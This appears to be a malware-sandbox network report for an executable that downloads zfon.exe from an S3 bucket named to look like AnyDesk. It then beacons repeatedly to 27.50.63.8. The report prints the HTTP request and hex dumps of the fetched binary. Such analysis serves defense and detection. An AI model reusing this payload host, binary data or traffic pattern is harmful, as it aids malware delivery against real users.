                                                                                              Dec 18, 2024 13:06:10.601563931 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.643682957 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.698970079 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.698992014 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.699018002 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.699035883 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.699047089 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.699062109 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.699162960 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.699162960 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.699177027 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.699192047 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.699238062 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.753289938 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.947529078 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.947545052 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.947587967 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.947599888 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.947633982 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.947647095 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.947688103 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.947688103 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.958344936 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.003093004 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.199079990 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.199107885 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.199152946 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.199176073 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.199182034 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.199198008 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.199248075 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.199248075 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.441274881 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.441294909 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.441320896 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.441430092 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.441430092 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.441445112 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.441492081 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.452043056 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.503196001 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.690045118 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.690057993 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.690109968 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.690118074 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.690277100 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.690290928 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.690336943 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.911842108 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.911853075 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.911909103 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.911947966 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.911993980 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.912005901 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.912019968 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.912363052 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.138681889 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.138708115 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.138832092 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.138842106 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.138892889 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.145194054 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.185436964 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.185461044 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.185606956 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.185619116 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.237462044 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.237473965 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.284359932 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.394427061 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.394440889 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.394494057 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.394498110 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.394519091 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.394539118 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.394551039 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.394567966 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.394587994 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.394596100 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.440548897 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.530759096 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.530775070 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.530807972 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.530847073 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.530857086 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.531022072 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.531035900 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.576266050 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.635720015 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.635735989 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.635795116 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.635822058 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.635849953 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.635865927 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.635876894 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.635931015 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.650412083 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.650423050 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.650460005 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.650490046 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.650497913 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.650527000 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.650547981 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.651017904 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:25.854545116 CET497944433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:06:25.974111080 CET44334979427.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:06:25.974237919 CET497944433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:06:29.399926901 CET497944433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:06:29.638916969 CET44334979427.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:06:29.638933897 CET44334979427.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:06:29.638942957 CET44334979427.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:06:29.638952017 CET44334979427.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:06:30.141619921 CET44334979427.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:06:30.221925974 CET497944433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:06:30.246294975 CET497944433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:06:30.365860939 CET44334979427.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:06:30.365892887 CET44334979427.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:06:30.365957975 CET44334979427.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:06:30.366014957 CET44334979427.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:06:30.366027117 CET497944433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:06:30.485449076 CET44334979427.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:06:50.482614994 CET497944433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:06:50.602132082 CET44334979427.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:06:51.007214069 CET44334979427.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:06:51.060076952 CET497944433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:07:09.574800968 CET497944433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:07:09.694451094 CET44334979427.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:07:10.099812984 CET44334979427.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:07:10.152422905 CET497944433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:07:27.871495962 CET497944433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:07:27.991255999 CET44334979427.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:07:28.396506071 CET44334979427.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:07:28.449311018 CET497944433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:07:44.715734959 CET497944433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:07:44.715780020 CET497944433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:07:44.835333109 CET44334979427.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:07:44.835388899 CET497944433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:07:49.714345932 CET4999810443192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:07:49.833933115 CET104434999827.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:07:49.834031105 CET4999810443192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:07:51.198014021 CET4999810443192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:07:51.317794085 CET104434999827.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:07:51.317838907 CET104434999827.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:07:51.317874908 CET104434999827.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:07:51.317934036 CET104434999827.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:07:51.965949059 CET104434999827.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:07:52.121172905 CET4999810443192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:07:52.619574070 CET4999810443192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:07:52.739650965 CET104434999827.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:07:52.739684105 CET104434999827.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:07:52.739717007 CET4999810443192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:07:52.739818096 CET104434999827.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:07:52.739835024 CET104434999827.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:07:52.859265089 CET104434999827.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:08:07.199796915 CET4999810443192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:08:07.320457935 CET104434999827.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:08:07.727238894 CET104434999827.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:08:07.877031088 CET4999810443192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:08:24.793258905 CET4999810443192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:08:24.914757967 CET104434999827.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:08:25.321516037 CET104434999827.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:08:25.418081045 CET4999810443192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:08:41.777662992 CET4999810443192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:08:41.777714014 CET4999810443192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:08:41.897352934 CET104434999827.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:08:41.897444010 CET4999810443192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:08:46.731203079 CET500124433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:08:46.850872993 CET44335001227.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:08:46.855031013 CET500124433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:08:48.841269970 CET500124433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:08:48.961283922 CET44335001227.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:08:48.961313009 CET44335001227.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:08:48.961329937 CET44335001227.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:08:48.961349964 CET44335001227.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:08:49.603595972 CET44335001227.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:08:49.739937067 CET500124433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:08:49.804444075 CET500124433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:08:49.924206018 CET44335001227.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:08:49.924230099 CET44335001227.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:08:49.924246073 CET44335001227.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:08:49.924258947 CET44335001227.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:08:49.924264908 CET500124433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:08:50.043934107 CET44335001227.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:09:04.949543953 CET500124433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:09:05.069375992 CET44335001227.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:09:05.472817898 CET44335001227.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:09:05.540215969 CET500124433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:09:22.528592110 CET500124433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:09:22.648085117 CET44335001227.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:09:23.051512003 CET44335001227.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:09:23.208380938 CET500124433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:09:39.575072050 CET500124433192.168.2.527.50.63.8
                                                                                              Dec 18, 2024 13:09:39.694735050 CET44335001227.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:09:40.097928047 CET44335001227.50.63.8192.168.2.5
                                                                                              Dec 18, 2024 13:09:40.246264935 CET500124433192.168.2.527.50.63.8
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 18, 2024 13:05:40.168242931 CET5300153192.168.2.51.1.1.1
                                                                                              Dec 18, 2024 13:05:40.377370119 CET53530011.1.1.1192.168.2.5
                                                                                              Dec 18, 2024 13:05:51.576292992 CET5822853192.168.2.51.1.1.1
                                                                                              Dec 18, 2024 13:05:51.780801058 CET53582281.1.1.1192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.143595934 CET5183053192.168.2.51.1.1.1
                                                                                              Dec 18, 2024 13:05:59.281693935 CET53518301.1.1.1192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.979022980 CET6160553192.168.2.51.1.1.1
                                                                                              Dec 18, 2024 13:06:06.234361887 CET53616051.1.1.1192.168.2.5
                                                                                              Dec 18, 2024 13:06:29.887763023 CET5189653192.168.2.51.1.1.1
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Dec 18, 2024 13:05:40.168242931 CET192.168.2.51.1.1.10xa0d3Standard query (0)anydesk17.s3.ap-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                              Dec 18, 2024 13:05:51.576292992 CET192.168.2.51.1.1.10x1df8Standard query (0)anydesk17.s3.ap-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                              Dec 18, 2024 13:05:59.143595934 CET192.168.2.51.1.1.10x1125Standard query (0)anydesk17.s3.ap-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                              Dec 18, 2024 13:06:05.979022980 CET192.168.2.51.1.1.10x7caeStandard query (0)anydesk17.s3.ap-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                              Dec 18, 2024 13:06:29.887763023 CET192.168.2.51.1.1.10x7cefStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Dec 18, 2024 13:05:40.377370119 CET1.1.1.1192.168.2.50xa0d3No error (0)anydesk17.s3.ap-east-1.amazonaws.coms3-r-w.ap-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 18, 2024 13:05:40.377370119 CET1.1.1.1192.168.2.50xa0d3No error (0)s3-r-w.ap-east-1.amazonaws.com3.5.237.31A (IP address)IN (0x0001)false
                                                                                              Dec 18, 2024 13:05:40.377370119 CET1.1.1.1192.168.2.50xa0d3No error (0)s3-r-w.ap-east-1.amazonaws.com3.5.238.29A (IP address)IN (0x0001)false
                                                                                              Dec 18, 2024 13:05:51.780801058 CET1.1.1.1192.168.2.50x1df8No error (0)anydesk17.s3.ap-east-1.amazonaws.coms3-r-w.ap-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 18, 2024 13:05:51.780801058 CET1.1.1.1192.168.2.50x1df8No error (0)s3-r-w.ap-east-1.amazonaws.com3.5.238.183A (IP address)IN (0x0001)false
                                                                                              Dec 18, 2024 13:05:51.780801058 CET1.1.1.1192.168.2.50x1df8No error (0)s3-r-w.ap-east-1.amazonaws.com52.95.162.58A (IP address)IN (0x0001)false
                                                                                              Dec 18, 2024 13:05:59.281693935 CET1.1.1.1192.168.2.50x1125No error (0)anydesk17.s3.ap-east-1.amazonaws.coms3-r-w.ap-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 18, 2024 13:05:59.281693935 CET1.1.1.1192.168.2.50x1125No error (0)s3-r-w.ap-east-1.amazonaws.com3.5.239.146A (IP address)IN (0x0001)false
                                                                                              Dec 18, 2024 13:05:59.281693935 CET1.1.1.1192.168.2.50x1125No error (0)s3-r-w.ap-east-1.amazonaws.com52.95.161.53A (IP address)IN (0x0001)false
                                                                                              Dec 18, 2024 13:06:06.234361887 CET1.1.1.1192.168.2.50x7caeNo error (0)anydesk17.s3.ap-east-1.amazonaws.coms3-r-w.ap-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 18, 2024 13:06:06.234361887 CET1.1.1.1192.168.2.50x7caeNo error (0)s3-r-w.ap-east-1.amazonaws.com52.95.161.33A (IP address)IN (0x0001)false
                                                                                              Dec 18, 2024 13:06:06.234361887 CET1.1.1.1192.168.2.50x7caeNo error (0)s3-r-w.ap-east-1.amazonaws.com52.95.160.78A (IP address)IN (0x0001)false
                                                                                              Dec 18, 2024 13:06:30.024620056 CET1.1.1.1192.168.2.50x7cefNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                              • anydesk17.s3.ap-east-1.amazonaws.com
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.5497103.5.237.314431472C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 12:05:42 UTC94OUTGET /zfon.exe HTTP/1.1
                                                                                              Host: anydesk17.s3.ap-east-1.amazonaws.com
                                                                                              Connection: Keep-Alive
                                                                                              2024-12-18 12:05:43 UTC447INHTTP/1.1 200 OK
                                                                                              x-amz-id-2: ZveAHjRBx716hkN64ZfUR7XXfnibshdG4f++qUuoZ0blm5PE27loBiFPDhGAyzAyOln4Qbfo3M56jJIO1F0jSHN8BY8/kEtn
                                                                                              x-amz-request-id: KQR1N4PHTFS88F6Q
                                                                                              Date: Wed, 18 Dec 2024 12:05:44 GMT
                                                                                              Last-Modified: Fri, 13 Dec 2024 18:14:06 GMT
                                                                                              ETag: "44ad77338a945fe1451861b59267a68d"
                                                                                              x-amz-server-side-encryption: AES256
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Type: binary/octet-stream
                                                                                              Content-Length: 2659840
                                                                                              Server: AmazonS3
                                                                                              Connection: close
                                                                                              2024-12-18 12:05:43 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bf cc 31 f5 fb ad 5f a6 fb ad 5f a6 fb ad 5f a6 1e f4 5a a7 f9 ad 5f a6 65 0d 98 a6 fa ad 5f a6 c0 f3 5c a7 f8 ad 5f a6 c0 f3 5a a7 e0 ad 5f a6 c0 f3 5b a7 f5 ad 5f a6 c0 f3 5e a7 ff ad 5f a6 09 f4 5b a7 f7 ad 5f a6 29 f6 5a a7 a0 ad 5f a6 86 d4 82 a6 f8 ad 5f a6 6c f3 5a a7 f1 ad 5f a6 f2 d5 cc a6 e1 ad 5f a6 fb ad 5e a6 c7 ac 5f a6 69 f3 5a a7 c8 ad 5f a6 69 f3 5f a7 fa ad 5f
                                                                                              Data Ascii: MZ@0!L!This program cannot be run in DOS mode.$1___Z_e_\_Z_[_^_[_)Z__lZ__^_iZ_i__
                                                                                              2024-12-18 12:05:43 UTC577INData Raw: 49 23 c6 48 3b d8 73 0f 48 b8 00 00 00 00 00 00 00 80 48 3b c8 73 1a 48 8d 0c 5b 48 c1 e1 03 e8 8c c7 ff ff 48 89 07 48 8b c3 49 23 c6 48 89 47 10 44 0f b6 4c 24 40 48 8b d6 4c 8b 07 48 8b cd e8 eb 02 00 00 48 8b 6c 24 50 48 89 5f 08 48 8b 5c 24 48 48 83 c4 20 41 5e 5f 5e c3 cc cc cc cc 48 3b ca 0f 84 8d 00 00 00 57 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 48 89 5c 24 40 48 8b fa 48 8d 59 08 4c 8b 43 08 4d 85 c0 74 16 49 8b 40 08 48 63 48 04 49 83 c0 08 49 03 c8 48 8b 01 ff 50 08 90 48 8b 13 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 8b 53 f8 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 83 c3 20 48 8d 43 f8 48 3b c7 75 97 48 8b 5c 24 40 48 83 c4 30 5f c3 cc cc cc cc cc cc cc cc
                                                                                              Data Ascii: I#H;sHH;sH[HHHI#HGDL$@HLHHl$PH_H\$HH A^_^H;WH0HD$ H\$@HHYLCMtI@HcHIIHPHHtHBHcHHHHPHSHtHBHcHHHHPH HCH;uH\$@H0_
                                                                                              2024-12-18 12:05:43 UTC16384INData Raw: 8b 06 48 63 48 04 48 03 ce 83 49 10 02 48 83 79 08 00 75 04 83 49 10 01 45 84 ff 75 19 48 8b 06 48 63 48 04 48 03 ce 83 49 10 04 48 83 79 08 00 75 04 83 49 10 01 48 8b 7c 24 48 48 8b c6 48 8b 5c 24 40 48 8b 6c 24 50 48 83 c4 20 41 5f 41 5e 5e c3 48 8b 06 48 63 48 04 48 8b 54 31 08 48 8b 42 10 48 3b 42 18 75 0b 48 8b 02 48 8b ca ff 50 40 eb c3 48 ff c0 48 89 42 10 eb ba cc cc cc 48 89 4c 24 08 48 83 ec 48 48 c7 44 24 20 fe ff ff ff 48 8b c2 48 8d 54 24 68 48 89 54 24 28 48 89 4c 24 30 48 85 c9 74 36 48 8d 15 b8 5c 0e 00 48 89 11 33 d2 48 89 51 08 88 51 10 48 8b 40 08 48 85 c0 74 06 4c 8b 40 08 eb 03 4c 8b c2 48 85 c0 74 03 48 8b 10 41 b1 01 e8 c2 e8 ff ff 90 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc 40 53 55 56 57 41 54 41 56 41 57 48 83 ec 30 48
                                                                                              Data Ascii: HcHHIHyuIEuHHcHHIHyuIH|$HHH\$@Hl$PH A_A^^HHcHHT1HBH;BuHHP@HHBHL$HHHD$ HHT$hHT$(HL$0Ht6H\H3HQQH@HtL@LHtHAHH@SUVWATAVAWH0H
                                                                                              2024-12-18 12:05:43 UTC1024INData Raw: 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 83 c4 78 41 5f 41 5e 41 5d 41 5c 5f 5e 5b 5d c3 cc cc cc cc 40 57 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 48 89 5c 24 40 49 8b f9 49 8b d8 4c 8b 02 4d 85 c0 74 16 49 8b 40 08 48 63 48 04 49 83 c0 08 49 03 c8 48 8b 01 ff 50 08 90 48 8b 13 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 8b 17 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 8b 5c 24 40 48 83 c4 30 5f c3 cc 40 57 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 48 89 5c 24 40 49 8b f9 49 8b d8 4c 8b 02 4d 85 c0 74 16 49 8b 40 08 48 63 48 04 49 83 c0 08 49 03 c8 48 8b 01 ff 50 08 90 48 8b 13 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48
                                                                                              Data Ascii: tHBHcHHHHPHxA_A^A]A\_^[]@WH0HD$ H\$@IILMtI@HcHIIHPHHtHBHcHHHHPHHtHBHcHHHHPH\$@H0_@WH0HD$ H\$@IILMtI@HcHIIHPHHtHBHcHHHH
